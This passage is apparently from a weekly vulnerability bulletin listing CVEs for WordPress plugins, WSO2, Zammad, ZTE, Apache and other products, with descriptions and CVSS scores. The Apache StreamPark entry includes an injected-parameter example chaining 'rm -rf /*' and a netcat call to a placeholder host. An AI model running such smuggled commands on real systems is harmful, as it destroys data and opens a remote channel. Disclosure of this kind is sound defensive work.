Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brainstorm Force Spectra - WordPress Gutenberg Blocks allows Stored XSS.This issue affects Spectra - WordPress Gutenberg Blocks: from n/a through 2.7.9.
2023-12-14
6.5
CVE-2023-49833
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Paul Bearne Author Avatars List/Block allows Stored XSS.This issue affects Author Avatars List/Block: from n/a through 2.1.17.
2023-12-14
6.5
CVE-2023-49846
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Twinpictures Annual Archive allows Stored XSS.This issue affects Annual Archive: from n/a through 1.6.0.
2023-12-14
6.5
CVE-2023-49847
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in weDevs WP Project Manager - Task, team, and project management plugin featuring kanban board and gantt charts allows Stored XSS.This issue affects WP Project Manager - Task, team, and project management plugin featuring kanban board and gantt charts: from n/a through 2.6.7.
2023-12-14
6.5
CVE-2023-49860
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Averta Shortcodes and extra features for Phlox theme allows Stored XSS.This issue affects Shortcodes and extra features for Phlox theme: from n/a through 2.15.2.
2023-12-14
6.5
CVE-2023-50368
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Alma Alma - Pay in installments or later for WooCommerce allows Stored XSS.This issue affects Alma - Pay in installments or later for WooCommerce: from n/a through 5.1.3.
2023-12-14
6.5
CVE-2023-50369
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Livemesh WPBakery Page Builder Addons by Livemesh allows Stored XSS.This issue affects WPBakery Page Builder Addons by Livemesh: from n/a through 3.5.
2023-12-14
6.5
CVE-2023-50370
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Page Visit Counter Advanced Page Visit Counter - Most Wanted Analytics Plugin for WordPress allows Stored XSS.This issue affects Advanced Page Visit Counter - Most Wanted Analytics Plugin for WordPress: from n/a through 8.0.6.
2023-12-14
6.5
CVE-2023-50371
[email protected]
wordpress -- wordpress
The EmbedPress WordPress plugin before 3.9.2 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
2023-12-11
6.1
CVE-2023-5749
[email protected]
wordpress -- wordpress
The EmbedPress WordPress plugin before 3.9.2 does not sanitise and escape a parameter before outputting it back in the page containing a specific content, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
2023-12-11
6.1
CVE-2023-5750
[email protected]
wordpress -- wordpress
The File Manager WordPress plugin before 6.3 does not restrict the file managers root directory, allowing an administrator to set a root outside of the WordPress root directory, giving access to system files and directories even in a multisite setup, where site administrators should not be allowed to modify the sites files.
2023-12-11
6.5
CVE-2023-5907
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Andreas Münch Multiple Post Passwords allows Stored XSS.This issue affects Multiple Post Passwords: from n/a through 1.1.1.
2023-12-14
5.9
CVE-2023-49157
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Real Big Plugins Client Dash allows Stored XSS.This issue affects Client Dash: from n/a through 2.2.1.
2023-12-15
5.9
CVE-2023-49165
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS.This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5.
2023-12-15
5.9
CVE-2023-49174
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kreativo Pro KP Fastest Tawk.To Chat allows Stored XSS.This issue affects KP Fastest Tawk.To Chat: from n/a through 1.1.1.
2023-12-15
5.9
CVE-2023-49175
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ternstyle LLC Automatic Youtube Video Posts Plugin allows Stored XSS.This issue affects Automatic Youtube Video Posts Plugin: from n/a through 5.2.2.
2023-12-15
5.9
CVE-2023-49180
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Event Manager WP Event Manager - Events Calendar, Registrations, Sell Tickets with WooCommerce allows Stored XSS.This issue affects WP Event Manager - Events Calendar, Registrations, Sell Tickets with WooCommerce: from n/a through 3.1.40.
2023-12-15
5.9
CVE-2023-49181
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPDeveloper Parallax Slider Block allows Stored XSS.This issue affects Parallax Slider Block: from n/a through 1.2.4.
2023-12-15
5.9
CVE-2023-49184
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ZealousWeb Track Geolocation Of Users Using Contact Form 7 allows Stored XSS.This issue affects Track Geolocation Of Users Using Contact Form 7: from n/a through 1.4.
2023-12-15
5.9
CVE-2023-49188
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Getsocial, S.A. Social Share Buttons & Analytics Plugin - GetSocial.Io allows Stored XSS.This issue affects Social Share Buttons & Analytics Plugin - GetSocial.Io: from n/a through 4.3.12.
2023-12-15
5.9
CVE-2023-49189
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chandra Shekhar Sahu Site Offline Or Coming Soon Or Maintenance Mode allows Stored XSS.This issue affects Site Offline Or Coming Soon Or Maintenance Mode: from n/a through 1.5.6.
2023-12-15
5.9
CVE-2023-49190
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Supsystic GDPR Cookie Consent by Supsystic allows Stored XSS.This issue affects GDPR Cookie Consent by Supsystic: from n/a through 2.1.2.
2023-12-15
5.9
CVE-2023-49191
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kyle Phillips Nested Pages allows Stored XSS.This issue affects Nested Pages: from n/a through 3.2.6.
2023-12-14
5.9
CVE-2023-49195
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jeff Starr Dashboard Widgets Suite allows Stored XSS.This issue affects Dashboard Widgets Suite: from n/a through 3.4.1.
2023-12-14
5.9
CVE-2023-49743
[email protected]
wordpress -- wordpress
Cross-Site Request Forgery (CSRF) vulnerability in Gift Up Gift Up Gift Cards for WordPress and WooCommerce.This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n/a through 2.21.3.
2023-12-15
5.4
CVE-2023-49744
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebFactory Ltd Guest Author allows Stored XSS.This issue affects Guest Author: from n/a through 2.3.
2023-12-15
5.9
CVE-2023-49747
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Stored XSS.This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24.
2023-12-15
5.9
CVE-2023-49767
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Peter Raschendorfer Smart External Link Click Monitor [Link Log] allows Stored XSS.This issue affects Smart External Link Click Monitor [Link Log]: from n/a through 5.0.2.
2023-12-14
5.9
CVE-2023-49770
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeum Tutor LMS - eLearning and online course solution allows Stored XSS.This issue affects Tutor LMS - eLearning and online course solution: from n/a through 2.2.4.
2023-12-15
5.9
CVE-2023-49829
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brontobytes Cookie Bar allows Stored XSS.This issue affects Cookie Bar: from n/a through 2.0.
2023-12-14
5.9
CVE-2023-49836
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FancyThemes Optin Forms - Simple List Building Plugin for WordPress allows Stored XSS.This issue affects Optin Forms - Simple List Building Plugin for WordPress: from n/a through 1.3.3.
2023-12-14
5.9
CVE-2023-49841
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpexpertsio Rocket Maintenance Mode & Coming Soon Page allows Stored XSS.This issue affects Rocket Maintenance Mode & Coming Soon Page: from n/a through 4.3.
2023-12-14
5.9
CVE-2023-49842
[email protected]
wordpress -- wordpress
Cross-Site Request Forgery (CSRF) vulnerability in Apasionados, Apasionados del Marketing, NetConsulting DoFollow Case by Case.This issue affects DoFollow Case by Case: from n/a through 3.4.2.
2023-12-15
4.3
CVE-2023-49197
[email protected]
wordpress -- wordpress
Cross-Site Request Forgery (CSRF) vulnerability in SureTriggers SureTriggers - Connect All Your Plugins, Apps, Tools & Automate Everything!.This issue affects SureTriggers - Connect All Your Plugins, Apps, Tools & Automate Everything!: from n/a through 1.0.23.
2023-12-15
4.3
CVE-2023-49749
[email protected]
wordpress -- wordpress
The WP Crowdfunding WordPress plugin before 2.1.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)
2023-12-11
4.8
CVE-2023-5757
[email protected]
wordpress -- wordpress
The WP Not Login Hide (WPNLH) WordPress plugin through 1.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)
2023-12-11
4.8
CVE-2023-5940
[email protected]
wordpress -- wordpress
The Contact Form Email WordPress plugin before 1.3.44 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)
2023-12-11
4.8
CVE-2023-5955
[email protected]
wso2 -- wso2_api_manager
Reflected XSS vulnerability can be exploited by tampering a request parameter in Authentication Endpoint. This can be performed in both authenticated and unauthenticated requests.
2023-12-15
6.1
CVE-2023-6838
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 -- wso2_api_manager
Due to improper error handling, a REST API resource could expose a server side error containing an internal WSO2 specific package name in the HTTP response.
2023-12-15
5.3
CVE-2023-6839
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 -- wso2_api_manager
Multiple WSO2 products have been identified as vulnerable due to lack of server-side input validation in the Forum feature, API rating could be manipulated.
2023-12-15
4.3
CVE-2023-6835
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 -- wso2_api_manager
Multiple WSO2 products have been identified as vulnerable due to an XML External Entity (XXE) attack abuses a widely available but rarely used feature of XML parsers to access sensitive information.
2023-12-15
4.6
CVE-2023-6836
ed10eef1-636d-4fbe-9993-6890dfa878f8
xaviershay-dm-rails_porject -- xaviershay-dm-rails
The xaviershay-dm-rails gem 0.10.3.8 for Ruby allows local users to discover MySQL credentials by listing a process and its arguments.
2023-12-12
5.5
CVE-2015-2179
[email protected]
xunruicms -- xunruicms
XunRuiCMS v4.5.5 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /admin.php.
2023-12-11
6.1
CVE-2023-49490
[email protected]
xwiki -- xwiki_platform
XWiki Platform is a generic wiki platform. Prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for objcontent:email* using XWiki's regular search interface. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled. There are no known workarounds for this vulnerability.
2023-12-15
5.3
CVE-2023-50720
[email protected]
[email protected]
[email protected]
zammad -- zammad
An issue was discovered in Zammad before 6.2.0. It uses the public endpoint /api/v1/signshow for its login screen. This endpoint returns internal configuration data of user object attributes, such as selectable values, which should not be visible to the public.
2023-12-10
5.3
CVE-2023-50453
[email protected]
zammad -- zammad
An issue was discovered in Zammad before 6.2.0. In several subsystems, SSL/TLS was used to establish connections to external services without proper validation of hostname and certificate authority. This is exploitable by man-in-the-middle attackers.
2023-12-10
5.9
CVE-2023-50454
[email protected]
zammad -- zammad
An issue was discovered in Zammad before 6.2.0. An attacker can trigger phishing links in generated notification emails via a crafted first or last name.
2023-12-10
5.3
CVE-2023-50456
[email protected]
zammad -- zammad
An issue was discovered in Zammad before 6.2.0. When listing tickets linked to a knowledge base answer, or knowledge base answers of a ticket, a user could see entries for which they lack permissions.
2023-12-10
4.3
CVE-2023-50457
[email protected]
zoom -- multiple_products
Cryptographic issues Zoom Mobile App for Android, Zoom Mobile App for iOS, and Zoom SDKs for Android and iOS before version 5.16.0 may allow a privileged user to conduct a disclosure of information via network access.
2023-12-13
4.9
CVE-2023-43583
[email protected]
zoom -- zoom
Improper authentication in some Zoom clients before version 5.16.5 may allow an authenticated user to conduct a denial of service via network access.
2023-12-13
6.4
CVE-2023-49646
[email protected]
zte -- mc801a
There is a buffer overflow vulnerability in some ZTE mobile internet producsts. Due to insufficient validation of tcp port parameter, an authenticated attacker could use the vulnerability to perform a denial of service attack.
2023-12-14
5.9
CVE-2023-25642
[email protected]
zte -- multiple_products
There is a denial of service vulnerability in some ZTE mobile internet products. Due to insufficient validation of Web interface parameter, an attacker could use the vulnerability to perform a denial of service attack.
2023-12-14
6.5
CVE-2023-25644
[email protected]
zte -- multiple_products
There is a SQL injection vulnerability in some ZTE mobile internet products. Due to insufficient input validation of SMS interface parameter, an authenticated attacker could use the vulnerability to execute SQL injection and cause information leak.
2023-12-14
4.3
CVE-2023-25651
[email protected]
zte -- zxcloud_irai
There is a weak folder permission vulnerability in ZTE's ZXCLOUD iRAI product. Due to weak folder permission, an attacker with ordinary user privileges could construct a fake DLL to execute command to escalate local privileges.
2023-12-14
6.5
CVE-2023-25648
[email protected]
zte -- zxcloud_irai
There is an arbitrary file download vulnerability in ZXCLOUD iRAI. Since the backend does not escape special strings or restrict paths, an attacker with user permission could access the download interface by modifying the request parameter, causing arbitrary file downloads.
2023-12-14
6.5
CVE-2023-25650
[email protected]

Back to top

Low Vulnerabilities

Primary
Vendor -- Product Description Published CVSS Score Source & Patch Info
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Input Validation vulnerability. A low-privileged attacker could leverage this vulnerability to achieve a low-integrity impact within the application. Exploitation of this issue requires user interaction.
2023-12-15
3.5
CVE-2023-48608
[email protected]
apache -- server
A flaw was found in the mod_proxy_cluster in the Apache server. This issue may allow a malicious user to add a script in the 'alias' parameter in the URL to trigger the stored cross-site scripting (XSS) vulnerability. By adding a script on the alias parameter on the URL, it adds a new virtual host and adds the script to the cluster-manager page. The impact of this vulnerability is considered as Low, as the cluster_manager URL should not be exposed outside and is protected by user/password.
2023-12-12
3.5
CVE-2023-6710
[email protected]
[email protected]
apple -- macos
This issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.2. Secure text fields may be displayed via the Accessibility Keyboard when using a physical keyboard.
2023-12-12
2.4
CVE-2023-42874
[email protected]
[email protected]
codeastro -- pos_and_inventory_management_system
A vulnerability was found in CodeAstro POS and Inventory Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /item/item_con. The manipulation of the argument item_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247911.
2023-12-13
3.5
CVE-2023-6775
[email protected]
[email protected]
[email protected]
fortinet -- multiple_products
An improper access control vulnerability [CWE-284] in FortiOS version 7.2.0, version 7.0.13 and below, version 6.4.14 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below may allow a remote unauthenticated attacker to bypass the firewall deny geolocalisation policy via timing the bypass with a GeoIP database update.
2023-12-13
3.1
CVE-2023-47536
[email protected]
gitlab -- gitlab
An issue has been discovered in GitLab EE affecting all versions starting from 8.17 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible for auditor users to fork and submit merge requests to private projects they're not a member of.
2023-12-15
2
CVE-2023-3511
[email protected]
[email protected]
h2o -- h2o
h2o is an HTTP server with support for HTTP/1.x, HTTP/2 and HTTP/3. The QUIC stack (quicly), as used by H2O up to commit 43f86e5 (in version 2.3.0-beta and prior), is susceptible to a state exhaustion attack. When H2O is serving HTTP/3, a remote attacker can exploit this vulnerability to progressively increase the memory retained by the QUIC stack. This can eventually cause H2O to abort due to memory exhaustion. The vulnerability has been resolved in commit d67e81d03be12a9d53dc8271af6530f40164cd35. HTTP/1 and HTTP/2 are not affected by this vulnerability as they do not use QUIC. Administrators looking to mitigate this issue without upgrading can disable HTTP/3 support.
2023-12-12
3.7
CVE-2023-50247
[email protected]
[email protected]
hcl_software -- hcl_connections
HCL Connections is vulnerable to an information disclosure vulnerability which could allow a user to obtain sensitive information they are not entitled to, caused by improper handling of request data.
2023-12-15
3.5
CVE-2023-28022
[email protected]
nautobot -- nautobot
Nautobot is a Network Source of Truth and Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. In Nautobot 1.x and 2.0.x prior to 1.6.7 and 2.0.6, the URLs /files/get/?name=... and /files/download/?name=... are used to provide admin access to files that have been uploaded as part of a run request for a Job that has FileVar inputs. Under normal operation these files are ephemeral and are deleted once the Job in question runs. In the default implementation used in Nautobot, as provided by django-db-file-storage, these URLs do not by default require any user authentication to access; they should instead be restricted to only users who have permissions to view Nautobot's FileProxy model instances. Note that no URL mechanism is provided for listing or traversal of the available file name values, so in practice an unauthenticated user would have to guess names to discover arbitrary files for download, but if a user knows the file name/path value, they can access it without authenticating, so we are considering this a vulnerability. Fixes are included in Nautobot 1.6.7 and Nautobot 2.0.6. No known workarounds are available other than applying the patches included in those versions.
2023-12-12
3.7
CVE-2023-50263
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
newsletter_software -- supermailer
Improper input validation vulnerability in Newsletter Software SuperMailer affecting version 11.20.0.2204. An attacker could exploit this vulnerability by sending a malicious configuration file (file with SMB extension) to a user via a link or email attachment and persuade the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to crash the application when attempting to load the malicious file.
2023-12-13
3.3
CVE-2023-6381
[email protected]
palo_alto_networks -- pan-os
An improper privilege management vulnerability in Palo Alto Networks PAN-OS software enables an authenticated read-only administrator to revoke active XML API keys from the firewall and disrupt XML API usage.
2023-12-13
2.7
CVE-2023-6793
[email protected]
sap -- cloud_connector
SAP Cloud Connector - version 2.0, allows an authenticated user with low privilege to perform Denial of service attack from adjacent UI by sending a malicious request which leads to low impact on the availability and no impact on confidentiality or Integrity of the application.
2023-12-12
3.5
CVE-2023-49578
[email protected]
[email protected]
siemens -- sinec_ins
A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). The Web UI of affected devices does not check the length of parameters in certain conditions. This allows a malicious admin to crash the server by sending a crafted request to the server. The server will automatically restart.
2023-12-12
2.7
CVE-2023-48429
[email protected]
siemens -- sinec_ins
A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). The REST API of affected devices does not check the length of parameters in certain conditions. This allows a malicious admin to crash the server by sending a crafted request to the API. The server will automatically restart.
2023-12-12
2.7
CVE-2023-48430
[email protected]
typecho -- typecho
A vulnerability classified as problematic was found in Typecho 1.2.1. Affected by this vulnerability is an unknown functionality of the file /admin/manage-pages.php of the component Page Handler. The manipulation leads to backdoor. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247249 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
2023-12-08
2.7
CVE-2023-6614
[email protected]
[email protected]
[email protected]
umbraco -- umbraco
Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.7.0, and 12.1.0, a user with access to a specific part of the backoffice is able to inject HTML code into a form where it is not intended. Versions 8.18.10, 10.7.0, and 12.1.0 contain a patch for this issue.
2023-12-12
3.5
CVE-2023-38694
[email protected]
wordpress -- wordpress
The Welcart e-Commerce plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.9.6 via the upload_certificate_file function. This makes it possible for administrators to upload .pem or .crt files to arbitrary locations on the server.
2023-12-09
2.7
CVE-2023-6120
[email protected]
[email protected]
[email protected]

Back to top

Severity Not Yet Assigned

Primary
Vendor -- Product Description Published CVSS Score Source & Patch Info
acronis -- acronis_cyber_protect_cloud_agent
Sensitive information disclosure and manipulation due to missing authorization. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 36943.
2023-12-14
not yet calculated
CVE-2023-48676
[email protected]
apache -- dubbo
A deserialization vulnerability existed when decode a malicious package.This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4. Users are recommended to upgrade to the latest version, which fixes the issue.
2023-12-15
not yet calculated
CVE-2023-29234
[email protected]
[email protected]
apache -- dubbo
Deserialization of Untrusted Data vulnerability in Apache Dubbo.This issue only affects Apache Dubbo 3.1.5. Users are recommended to upgrade to the latest version, which fixes the issue.
2023-12-15
not yet calculated
CVE-2023-46279
[email protected]
[email protected]
apache -- shiro
URL Redirection to Untrusted Site ('Open Redirect') vulnerability when "form" authentication is used in Apache Shiro. Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+.
2023-12-14
not yet calculated
CVE-2023-46750
[email protected]
apache -- streampark
In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
2023-12-15
not yet calculated
CVE-2023-49898
[email protected]
apache -- streampark_platform
In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue.
2023-12-15
not yet calculated
CVE-2023-30867
[email protected]
apache -- couchdb
Design document functions which receive a user http request object may expose authorization or session cookie headers of the user who accesses the document. These design document functions are: * list * show * rewrite * update An attacker can leak the session component using an HTML-like output, insert the session as an external resource (such as an image), or store the credential in a _local document with an "update" function. For the attack to succeed the attacker has to be able to insert the design documents into the database, then manipulate a user to access a function from that design document. Workaround: Avoid using design documents from untrusted sources which may attempt to access or manipulate request object's headers
2023-12-13
not yet calculated
CVE-2023-45725
[email protected]
[email protected]
aveva -- edge
An issue was discovered in ExecuteCommand() in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior that allows unauthenticated arbitrary commands to be executed.
2023-12-16
not yet calculated
CVE-2021-42796
[email protected]
[email protected]
aveva -- edge
Path traversal vulnerability in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior allows an unauthenticated user to steal the Windows access token of the user account configured for accessing external DB resources.
2023-12-16
not yet calculated
CVE-2021-42797
[email protected]
[email protected]
buy_addons -- bavideotab
SQL injection vulnerability in Buy Addons bavideotab before version 1.0.6, allows attackers to escalate privileges and obtain sensitive information via the component BaVideoTabSaveVideoModuleFrontController::run().
2023-12-14
not yet calculated
CVE-2023-48925
[email protected]
cams_biometrics -- multiple_products
SQL injection vulnerability in Cams Biometrics Zkteco, eSSL, Cams Biometrics Integration Module with HR Attendance (aka odoo-biometric-attendance) v. 13.0 through 16.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the db parameter in the controllers/controllers.py component.
2023-12-15
not yet calculated
CVE-2023-48050
[email protected]
cjson -- cjson
cJSON v1.7.16 was discovered to contain a segmentation violation via the function cJSON_InsertItemInArray at cJSON.c.
2023-12-14
not yet calculated
CVE-2023-50471
[email protected]
cjson -- cjson
cJSON v1.7.16 was discovered to contain a segmentation violation via the function cJSON_SetValuestring at cJSON.c.
2023-12-14
not yet calculated
CVE-2023-50472
[email protected]
common_services -- soliberte
SQL Injection vulnerability in functions/point_list.php in Common Services soliberte before v4.3.03 allows attackers to obtain sensitive information via the lat and lng parameters.
2023-12-14
not yet calculated
CVE-2023-40921
[email protected]
cybrosys_techno_solutions -- website_blog_search
A SQL injection vulnerability in Cybrosys Techno Solutions Website Blog Search (aka website_search_blog) v. 13.0 through 13.0.1.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the name parameter in controllers/main.py component.
2023-12-15
not yet calculated
CVE-2023-48049
[email protected]
dedebiz -- dedebiz
Cross Site Scripting (XSS) vulnerability in DedeBIZ v6.0.3 allows attackers to run arbitrary code via the search feature.
2023-12-14
not yet calculated
CVE-2023-31546
[email protected]
dreamer_cms -- dreamer_cms
Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/database/backup
2023-12-14
not yet calculated
CVE-2023-50017
[email protected]
emlog_pro -- emlog_pro
Emlog Pro v2.1.14 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /admin/article.php?active_savedraft.
2023-12-14
not yet calculated
CVE-2023-41618
[email protected]
emlog_pro -- emlog_pro
A Cross Site Scripting (XSS) vulnerability was discovered in Emlog Pro v2.1.14 via the component /admin/store.php.
2023-12-13
not yet calculated
CVE-2023-41621
[email protected]
empirecms -- empirecms
EmpireCMS v7.5 was discovered to contain a SQL injection vulnerability via the ftppassword parameter at SetEnews.php.
2023-12-14
not yet calculated
CVE-2023-50073
[email protected]
eyoucms -- eyoucms
A stored cross-site scripting (XSS) vulnerability in EyouCMS-V1.6.5-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Public Security Registration Number parameter.
2023-12-14
not yet calculated
CVE-2023-50566
[email protected]
fluid_components -- fluid_components
The fluid_components (aka Fluid Components) extension before 3.5.0 for TYPO3 allows XSS via a component argument parameter, for certain {content} use cases that may be edge cases.
2023-12-12
not yet calculated
CVE-2023-28604
[email protected]
[email protected]
freebsd -- freebsd
In versions of FreeBSD 14.0-RELEASE before 14-RELEASE-p2, FreeBSD 13.2-RELEASE before 13.2-RELEASE-p7 and FreeBSD 12.4-RELEASE before 12.4-RELEASE-p9, the pf(4) packet filter incorrectly validates TCP sequence numbers. This could allow a malicious actor to execute a denial-of-service attack against hosts behind the firewall.
2023-12-13
not yet calculated
CVE-2023-6534
[email protected]
freebsd -- freebsd
When a program running on an affected system appends data to a file via an NFS client mount, the bug can cause the NFS client to fail to copy in the data to be written but proceed as though the copy operation had succeeded. This means that the data to be written is instead replaced with whatever data had been in the packet buffer previously. Thus, an unprivileged user with access to an affected system may abuse the bug to trigger disclosure of sensitive information. In particular, the leak is limited to data previously stored in mbufs, which are used for network transmission and reception, and for certain types of inter-process communication. The bug can also be triggered unintentionally by system applications, in which case the data written by the application to an NFS mount may be corrupted. Corrupted data is written over the network to the NFS server, and thus also susceptible to being snooped by other hosts on the network. Note that the bug exists only in the NFS client; the version and implementation of the server has no effect on whether a given system is affected by the problem.
2023-12-13
not yet calculated
CVE-2023-6660
[email protected]
gradio-app -- gradio-app/gradio
Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository gradio-app/gradio prior to main.
2023-12-14
not yet calculated
CVE-2023-6572
[email protected]
[email protected]
grzegorz_marczynski -- dynamic_progress_bar
A SQL injection vulnerability in Grzegorz Marczynski Dynamic Progress Bar (aka web_progress) v. 11.0 through 11.0.2, v12.0 through v12.0.2, v.13.0 through v13.0.2, v.14.0 through v14.0.2.1, v.15.0 through v15.0.2, and v16.0 through v16.0.2.1 allows a remote attacker to gain privileges via the recency parameter in models/web_progress.py component.
2023-12-15
not yet calculated
CVE-2023-40954
[email protected]
[email protected]
h2oai -- h2oai/h2o-3
External Control of File Name or Path in h2oai/h2o-3
2023-12-14
not yet calculated
CVE-2023-6569
[email protected]
hp -- officejet_pro
Certain HP OfficeJet Pro printers are potentially vulnerable to a Denial of Service when sending a SOAP message to the service on TCP port 3911 that contains a body but no header.
2023-12-14
not yet calculated
CVE-2023-4694
[email protected]
insyde -- insydeh2o
TOCTOU race-condition vulnerability in Insyde InsydeH2O with Kernel 5.2 before version 05.27.29, Kernel 5.3 before version 05.36.29, Kernel 5.4 version before 05.44.13, and Kernel 5.5 before version 05.52.13 allows an attacker to alter data and code used by the remainder of the boot process.
2023-12-16
not yet calculated
CVE-2022-24351
[email protected]
[email protected]
ivanti -- connect_secure
A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker can send a specific request which may lead to Denial of Service (DoS) of the appliance.
2023-12-16
not yet calculated
CVE-2023-39340
[email protected]
ivanti -- connect_secure
A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker impersonating an administrator may craft a specific web request which may lead to remote code execution.
2023-12-14
not yet calculated
CVE-2023-41719
[email protected]
ivanti -- connect_secure
